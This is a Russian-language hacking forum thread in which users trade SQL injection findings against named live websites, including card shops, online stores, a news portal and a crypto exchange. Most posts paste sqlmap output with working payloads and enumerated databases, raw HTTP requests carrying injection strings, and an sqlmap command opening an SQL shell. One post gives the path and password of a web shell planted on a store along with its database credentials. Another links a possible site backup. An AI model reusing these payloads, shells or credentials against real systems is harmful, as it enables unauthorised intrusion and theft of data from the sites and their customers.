• XSS INCEPTION #5 - то, чего не было много лет. Е-зин, он же электронный журнал. Заходите! Выпуск #5 уже ждет вас!

Найденные интересеные SQL inj & XSS

solidaros

RAID-массив
Забанен
Регистрация
09.01.2021
Сообщения
70
Реакции
10
Пожалуйста, обратите внимание, что пользователь заблокирован

hackworld

HDD-drive
Пользователь
Регистрация
03.03.2019
Сообщения
49
Реакции
7
Код:
https://cardmafia.ru/inc/login.php" --data="submit=LOGIN%20NOW&captcha=1&login=klehbndy&password=zero0xa"
https://cvv2u.su/inc/login.php

Parameter: login (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: submit=LOGIN NOW&captcha=1&login=klehbndy' AND (SELECT 2182 FROM (SELECT(SLEEP(10)))kOID)-- CvDj&password=zero0xa

web server operating system: Linux Ubuntu
web application technology: Nginx 1.10.3, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] admin_shop
[*] information_schema
 

boroda4

floppy-диск
Пользователь
Регистрация
27.04.2021
Сообщения
5
Реакции
1
Поделюсь и я:
Код:
http://brodim.com/
web application technology: OpenResty
back-end DBMS: MySQL 5 (Percona fork)
parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=' UNION ALL SELECT CONCAT(CONCAT('qbpbq','eWMjYjKHOsohdtQcgSPLidZuuoDMdNGdaKhdvKVN'),'qzqpq'),NULL,NULL-- rmpl
available databases [2]:                                                                                                                                                                                                                  
[*] brodim
[*] information_schema
 

solidaros

RAID-массив
Забанен
Регистрация
09.01.2021
Сообщения
70
Реакции
10
Пожалуйста, обратите внимание, что пользователь заблокирован

solidaros

RAID-массив
Забанен
Регистрация
09.01.2021
Сообщения
70
Реакции
10
Пожалуйста, обратите внимание, что пользователь заблокирован
https://bigeria.com уязвим по унион,кому нужно легко вскроете
 

Woxo

floppy-диск
Пользователь
Регистрация
01.10.2018
Сообщения
1
Реакции
0
Код:
POST /webbots/btcPaymentStatusAjax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://apps1store.com/
Cookie: PHPSESSID=c904e4d0d7539116679cc30d6b107e0c;__tawkuuid=e::apps1store.com::2934SySEOkRyg5KwgL4sK+vgESdzKyaESIahpIwtpsHgm1CMAKrB22kqIXfmT4/Z::2;TawkConnectionTime=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host: apps1store.com
Connection: Keep-alive

address=-1'%20OR%203*2*1=6%20AND%20000553=000553%20--%20&email=sample%40email.tst&software=YouBotTub
 

solidaros

RAID-массив
Забанен
Регистрация
09.01.2021
Сообщения
70
Реакции
10
Пожалуйста, обратите внимание, что пользователь заблокирован
Код:
POST /webbots/btcPaymentStatusAjax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://apps1store.com/
Cookie: PHPSESSID=c904e4d0d7539116679cc30d6b107e0c;__tawkuuid=e::apps1store.com::2934SySEOkRyg5KwgL4sK+vgESdzKyaESIahpIwtpsHgm1CMAKrB22kqIXfmT4/Z::2;TawkConnectionTime=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host: apps1store.com
Connection: Keep-alive

address=-1'%20OR%203*2*1=6%20AND%20000553=000553%20--%20&email=sample%40email.tst&software=YouBotTub
1619793185208.png
глянем что там есть)
1619793279521.png
пароли печаль
 

Vodovoz

floppy-диск
Пользователь
Регистрация
18.12.2020
Сообщения
2
Реакции
0
Код:
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: https://123chef.es:443/vajilla-desechable/-7557' OR MAKE_SET(1846=1846,6124) AND 'MICJ'='MICJ


    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: https://123chef.es:443/vajilla-desechable/' AND GTID_SUBSET(CONCAT(0x717a716a71,(SELECT (ELT(7065=7065,1))),0x717a7a7071),7065) AND 'YnhS'='YnhS


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://123chef.es:443/vajilla-desechable/' AND (SELECT 7541 FROM (SELECT(SLEEP(5)))oFQI) AND 'DKtt'='DKtt


available databases [2]:
[*] c123chef_pres844
[*] information_schema
 

hits

RAID-массив
Пользователь
Регистрация
10.12.2018
Сообщения
96
Реакции
80
Код:
шоп на opencart оплата ба,так же весит джоб сайт,скуля:
sqlmap -u "https://gunaccessories.eu/?route=product/product&path=4_16&product_id=431*" --sql-shell --dbms="MySQL" --drop-set-cookie
шелл:
https://gunaccessories.eu/admin/controller/extension/extension/pasya.php:P@55w()rD

//pma
https://185.72.86.33/pma/
jobsnavigator.eu
define('DB_DRIVER', 'mysqli');
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'jobsnavi_gunacce');
define('DB_PASSWORD', 'mainPassword');
define('DB_DATABASE', 'jobsnavi_gunacces_maindb');
 

Vodovoz

floppy-диск
Пользователь
Регистрация
18.12.2020
Сообщения
2
Реакции
0
Possible backup. Не совсем в тему, но может кому пригодится.
Код:
https://paradise8.com/paradise8.zip
 

AsSdsiwi

CD-диск
Пользователь
Регистрация
19.04.2020
Сообщения
16
Реакции
-2
Скажите пожалуйста, направьте, есть ли ещё такие сайты/топики/блоги
где выкладывают найденные sql/xss уязвимости.
я новичок и мне важно тренироватся
 

boroda4

floppy-диск
Пользователь
Регистрация
27.04.2021
Сообщения
5
Реакции
1
Код:
"http://factjo.com/news.aspx/news.aspx?Id=-1;%20waitfor%20delay%20'0:0:6'%20--%20"
Parameter: Id (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
    Payload: Id=-2778 OR 5321 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5321=5321) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (random number) - 10 columns
    Payload: Id=-1073 UNION ALL SELECT 5693,5693,5693,5693,5693,5693,5693,5693,CHAR(113)+CHAR(98)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(90)+CHAR(102)+CHAR(118)+CHAR(118)+CHAR(111)+CHAR(77)+CHAR(66)+CHAR(66)+CHAR(85)+CHAR(68)+CHAR(110)+CHAR(85)+CHAR(75)+CHAR(70)+CHAR(72)+CHAR(112)+CHAR(83)+CHAR(109)+CHAR(119)+CHAR(99)+CHAR(107)+CHAR(79)+CHAR(73)+CHAR(101)+CHAR(116)+CHAR(85)+CHAR(117)+CHAR(115)+CHAR(66)+CHAR(90)+CHAR(122)+CHAR(66)+CHAR(101)+CHAR(90)+CHAR(104)+CHAR(112)+CHAR(82)+CHAR(112)+CHAR(100)+CHAR(82)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113),5693-- QieU

available databases [9]:
[*] factDB2016
[*] factNewsite
[*] FactoldDB
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
 

totulov45

HDD-drive
Пользователь
Регистрация
20.03.2020
Сообщения
36
Реакции
21
Код:
sqlmap.py -u "https://www.internacionalshopping.com/lojas/grava-destino.asp?destino=1065"

Parameter: destino (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: destino=1065' AND 8705=8705 AND 'TZKQ'='TZKQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: destino=1065' AND GTID_SUBSET(CONCAT(0x7162717a71,(SELECT (ELT(2855=2855,1))),0x71706a7671),2855) AND 'cdDB'='cdDB

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: destino=1065' OR SLEEP(5) AND 'NagB'='NagB
---
[13:53:20] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:53:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[13:53:29] [INFO] fetching database names
[13:53:32] [INFO] retrieved: 'information_schema'
[13:53:33] [INFO] retrieved: 'site_internacionalshopping'
available databases [2]:
[*] information_schema
[*] site_internacionalshopping
 

solidaros

RAID-массив
Забанен
Регистрация
09.01.2021
Сообщения
70
Реакции
10
Пожалуйста, обратите внимание, что пользователь заблокирован
Друзья, поделитесь уязвимостями
POST /api/shrink.php HTTP/1.1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Referer: 1ink.cc
Cookie: PHPSESSID=1a7i2fncurk3kdp93mdknb16j5
Host: www.1ink.cc
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

showads=0&uid=1&url=e
 
Последнее редактирование:

vally-hood

floppy-диск
Пользователь
Регистрация
10.06.2021
Сообщения
3
Реакции
1
POST /index.php?route=user/user/register HTTP/1.1
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: gecobitexchange.com
Cookie: PHPSESSID=fim62vuqm0rp5t2bpun89qtp60
Host: gecobitexchange.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ck_termini=on&code_affiliato=94102&email=-1'%20OR%203*2*1%3d6%20AND%20000805%3d000805%20--%20&password=g00dPa%24%24w0rD&rpassword=g00dPa%24%24w0rD
 
Верх